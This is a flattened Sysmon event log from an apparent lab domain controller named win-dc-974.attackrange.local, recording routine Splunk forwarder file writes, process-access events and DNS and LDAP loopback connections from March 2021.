Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF581E6CB8C6DCE5185852190FA9B214,SHA256=3D0543DA82D1C41B18141669041744BCFA344AFDEFC47EC48BE2950778A3D258,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001696784Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:04.920{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local50076- 10341000x80000000000000001696783Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:13.536{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-70D1-603D-6D88-00000000AD01}7436C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696782Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:13.536{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696781Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:13.536{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696780Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:13.536{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696779Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:13.536{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696778Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:13.536{05ADC7E1-229D-6039-0500-00000000AD01}636752C:\Windows\system32\csrss.exe{05ADC7E1-70D1-603D-6D88-00000000AD01}7436C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001696777Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:13.536{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-70D1-603D-6D88-00000000AD01}7436C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001696776Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:13.537{05ADC7E1-70D1-603D-6D88-00000000AD01}7436C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001696775Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:13.255{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BC088CE95077EEB91ACEA2033AFE4923,SHA256=185864DD27A97C860653E2AC5186163FBDA0E0516EE61E0E5EC327EC2DD8813F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001696774Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:13.067{05ADC7E1-70D0-603D-6C88-00000000AD01}45045448C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000001696773Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:13.021{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD8903E59D18D0F30ED85D29BF4BF3B4,SHA256=1AB524EE32919A33F0712E3D802DF896CDD7B21FE83C5DB0C5BC61D95E0236D9,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001696787Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:05.951{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local50076- 23542300x80000000000000001696786Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:14.572{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7521A32BEC9868EBEF820D8B7BF44F5A,SHA256=49D7758EFC686066938B2A0F5B40B1544C2A14A50B583572A4A0E23B7A221CAA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696785Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:14.036{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=470123F7B29D117FE83E421C29BFF589,SHA256=BBD2D67F4C5A8AA815CB6052E30BF4E02D206567E3BC646FFFAEDE976EA5B9CF,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001696789Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:07.483{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local55155-false10.0.1.12-8000- 23542300x80000000000000001696788Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:15.052{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3C2C5D53B5D5847205AE954613231E0,SHA256=B3128A3E67AA7EBAF108ADD9F2A0BE64721ED26818D8B1F3247CD44EE5466AD0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696791Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:16.646{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5B0BEA2EFEC02F009AAEBF9AC710F0CF,SHA256=A04E20D23E1B7316E63DB20F45A4E908E16BA2963DE445E813A24B30ED99AF36,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696790Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:16.074{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE73338F49F5D01FC6EE671A1361C516,SHA256=A51C6FC73F939088CB5428AF3A7F5C84A8796AF3433F25EC85D77C164FD434C2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696792Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:17.099{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3DE12FA46F0468E845749FB33539B0E,SHA256=F15DCFA1AEBB621669AF151D2F1E2DA817A99AE94422EBE48691F3A692D37C43,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696794Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:18.114{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE8829C3C772C00B0FB094A1767E6C3D,SHA256=7D9F751E7B852B04C7D06329A886110B871FCB561DA5F18C0A08E85241A21C88,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696793Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:18.021{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=48291CF713D7D95415F3BCD43FD85C20,SHA256=E48767D709A0D633B763515117838F8079E31DFAE3039D3C5B87F089C2784C0E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696795Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:19.130{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE3B4952D6960D12F913A70698926434,SHA256=C4375361741009C3B7B1AB896BD885C3047F9A9EA8FB9A88BBF782F25A3A32BC,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001696798Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:12.514{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local55156-false10.0.1.12-8000- 23542300x80000000000000001696797Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:20.193{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=544D9B9CF3327E4DA58DFAC724E950B1,SHA256=C511508178FB1902A95C4E586C7CC788D6B27B03DC802E775F2E25FC910EBA4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696796Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:20.146{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C8BBC458E1BE80B490760DD68C388DE,SHA256=E231A8F8139684C57130EA39FA3E08094E88409752C5CF93BEE6E7DC5C118F2A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696799Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:21.166{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6CFF1A9C647F4798265B7D02F20880EE,SHA256=D89077B6F88682400EF03B426E0F2CD873EBBF9EB126FE8D810248447EADB003,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696800Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:22.193{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F295EEC115221F9DE63CAF798F9D39A,SHA256=F824662F081A7945A5EF0DC28EEFB51E267B9685DB9AD4D0090A6C9FD978C3FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696801Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:23.224{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80397987ECEB3261335CB7EE5642171A,SHA256=6D185B444AC0B032807D880479BD81BB1AEB712EAFDD7C1CAE7D1925B3A523B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696802Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:24.224{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C110F6FCF710D93458A0277D462BE210,SHA256=5B86A02CFA94C6A6072EF79616D3F9B133FA2855C8B135C484F5C717A50886B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696804Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:25.239{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3FBD77EB01B1D4F512748FE3428E05F6,SHA256=CF76112DD3D8E9EFEE25777C71CBC5998159CEE2F29EDFFF09215860BAF9236A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696803Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:25.072{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2F24287FFB0F7E0A2F3486DD17E310AD,SHA256=81C420DD44E0DC497167D37BFFD381C4954926A6727408C6043EDBCE6CBB2F07,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696806Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:26.255{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2DCEB6F2893B72BA03E28959D77217F6,SHA256=1D7DF65D04779BC366B3B4980E3D92DA6A8E5E197A6F2410501A0CA64B6E1EC6,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001696805Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:17.576{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local55157-false10.0.1.12-8000- 23542300x80000000000000001696807Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:27.273{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7605EA823A2747C5AE3E3A494E5F6A02,SHA256=CEBF63661231498AE1B19B99BCEE3A7BBFC3673E2E086584133407C95DFFB4DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696808Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:28.286{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D58319E3C12C1161898EC0FBA06171D,SHA256=F35F5E9531490D047F72BE44884056572336328A53EF02CAE487A7C0E8C7D633,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696810Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:29.464{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=984312C1C6D8CD2D9EEC71392F051D38,SHA256=3CFD4A4CE2436CC523086D0A1722981B10F3EFAEAF18D733B93858C4CB4348F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696809Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:29.318{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E559E7BDFD6CFCD602D9116A4D5D5E3,SHA256=5100C48C45D561499BFC3F6EE9414ED63CFD02D6863C188A016BFFB129426347,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696813Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:30.463{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0209D67878FD6D01C13B2DDDE3461D9C,SHA256=FE06844A46F73B185EFF9DCC935116C29707323A678BB5F4CDA2D6EF3EE5B1A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696812Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:30.349{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C7C5396830E782959EB4790A50007AB,SHA256=ECC6B4897F63F697B4345B858FC9C0231EB48A819A28888F8EFCC90EC28FB86A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001696811Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:22.216{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local55691- 23542300x80000000000000001696815Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:31.896{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4E552D02D0B24FC3AEAC84D468FB4F20,SHA256=0FB84519F6F5B2775AB0DC9277B1CDB8AEF3CCE6F936272E25B5FBE96860A2E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696814Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:31.396{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36136F6C046B333892F191F66861A32F,SHA256=2309CBCA4898F064AF58CEE9ECF0FC162118648E3920502A303BA73DE3D25B3C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001696820Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:32.411{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=583FF631181A7A66ACFE07CD659ABC7C,SHA256=F258632B5A179636163BFD2099E63A1292CB4B3F2C4E981A7EFE60B39C851D9A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001696819Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:24.217{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local55159-true0:0:0:0:0:0:0:1win-dc-974.attackrange.local389ldap 